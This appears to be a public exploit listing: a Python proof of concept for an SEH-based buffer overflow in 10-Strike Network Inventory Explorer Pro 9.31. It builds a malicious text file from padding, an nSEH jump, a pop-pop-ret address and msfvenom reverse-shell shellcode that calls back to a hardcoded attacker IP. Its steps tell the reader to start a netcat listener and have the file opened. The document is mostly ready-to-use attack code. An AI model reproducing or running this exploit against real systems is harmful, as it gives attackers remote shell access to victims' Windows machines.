Share
## https://sploitus.com/exploit?id=PACKETSTORM:164739
# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH)  
# Date: 2021-10-31  
# Exploit Author: ro0k  
# Vendor Homepage: https://www.10-strike.com/  
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe  
# Version: 9.31  
# Tested on: Windows 10 x64 Education 21H1 Build 19043.928   
  
# Proof of Concept:  
# 1.Run python2 exploit.py to generate overflow.txt  
# 2.Transfer overflow.txt to the Windows 10 machine  
# 3.Setup Netcat listener on attacker machine   
# 4.Open 10-Strike Network Inventory Explorer Pro  
# 5.Select Computers tab from the uppermost set of tabs  
# 6.Select From Text File option  
# 7.Open overflow.txt  
# 8.Receive reverse shell connection on attacker machine!   
  
#!/usr/bin/env python  
import struct  
  
charslist = ""   
badchars = [0x00,0x09,0x0a,0x0d,0x3a,0x5c]   
  
for i in range (0x00, 0xFF+1):  
if i not in badchars:   
charslist += chr(i)   
  
#msfvenom -p windows/shell_reverse_tcp LHOST=10.2.170.242 LPORT=443 EXITFUNC=thread -f c -a x86 -b "\x00\x09\x0a\x0d\x3a\x5c"  
shellcode = ("\xd9\xc8\xd9\x74\x24\xf4\x58\x33\xc9\xbb\xc6\xbc\xd3\x19\xb1"  
"\x52\x83\xc0\x04\x31\x58\x13\x03\x9e\xaf\x31\xec\xe2\x38\x37"  
"\x0f\x1a\xb9\x58\x99\xff\x88\x58\xfd\x74\xba\x68\x75\xd8\x37"  
"\x02\xdb\xc8\xcc\x66\xf4\xff\x65\xcc\x22\xce\x76\x7d\x16\x51"  
"\xf5\x7c\x4b\xb1\xc4\x4e\x9e\xb0\x01\xb2\x53\xe0\xda\xb8\xc6"  
"\x14\x6e\xf4\xda\x9f\x3c\x18\x5b\x7c\xf4\x1b\x4a\xd3\x8e\x45"  
"\x4c\xd2\x43\xfe\xc5\xcc\x80\x3b\x9f\x67\x72\xb7\x1e\xa1\x4a"  
"\x38\x8c\x8c\x62\xcb\xcc\xc9\x45\x34\xbb\x23\xb6\xc9\xbc\xf0"  
"\xc4\x15\x48\xe2\x6f\xdd\xea\xce\x8e\x32\x6c\x85\x9d\xff\xfa"  
"\xc1\x81\xfe\x2f\x7a\xbd\x8b\xd1\xac\x37\xcf\xf5\x68\x13\x8b"  
"\x94\x29\xf9\x7a\xa8\x29\xa2\x23\x0c\x22\x4f\x37\x3d\x69\x18"  
"\xf4\x0c\x91\xd8\x92\x07\xe2\xea\x3d\xbc\x6c\x47\xb5\x1a\x6b"  
"\xa8\xec\xdb\xe3\x57\x0f\x1c\x2a\x9c\x5b\x4c\x44\x35\xe4\x07"  
"\x94\xba\x31\x87\xc4\x14\xea\x68\xb4\xd4\x5a\x01\xde\xda\x85"  
"\x31\xe1\x30\xae\xd8\x18\xd3\xdb\x1e\x88\xd1\xb4\x1c\xcc\x14"  
"\xfe\xa8\x2a\x7c\x10\xfd\xe5\xe9\x89\xa4\x7d\x8b\x56\x73\xf8"  
"\x8b\xdd\x70\xfd\x42\x16\xfc\xed\x33\xd6\x4b\x4f\x95\xe9\x61"  
"\xe7\x79\x7b\xee\xf7\xf4\x60\xb9\xa0\x51\x56\xb0\x24\x4c\xc1"  
"\x6a\x5a\x8d\x97\x55\xde\x4a\x64\x5b\xdf\x1f\xd0\x7f\xcf\xd9"  
"\xd9\x3b\xbb\xb5\x8f\x95\x15\x70\x66\x54\xcf\x2a\xd5\x3e\x87"  
"\xab\x15\x81\xd1\xb3\x73\x77\x3d\x05\x2a\xce\x42\xaa\xba\xc6"  
"\x3b\xd6\x5a\x28\x96\x52\x7a\xcb\x32\xaf\x13\x52\xd7\x12\x7e"  
"\x65\x02\x50\x87\xe6\xa6\x29\x7c\xf6\xc3\x2c\x38\xb0\x38\x5d"  
"\x51\x55\x3e\xf2\x52\x7c")  
  
#pattern_offset.rb -l 250 -q 41316841  
offset = 213  
  
#nasm > jmp short 8  
nseh = "\xeb\x06\x90\x90"  
junk = "A" * (offset - len(nseh))  
  
#0x61e012f6 : pop edi # pop ebp # ret | {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.12.2 (C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\sqlite3.dll)  
seh = struct.pack("<I", 0x61e012f6)  
  
#metasm > sub esp,0x10  
subesp10="\x83\xec\x10"  
payload = shellcode  
  
buffer = junk + nseh + seh + subesp10 + payload  
  
f = open("overflow.txt", "w")  
f.write(buffer)  
f.close()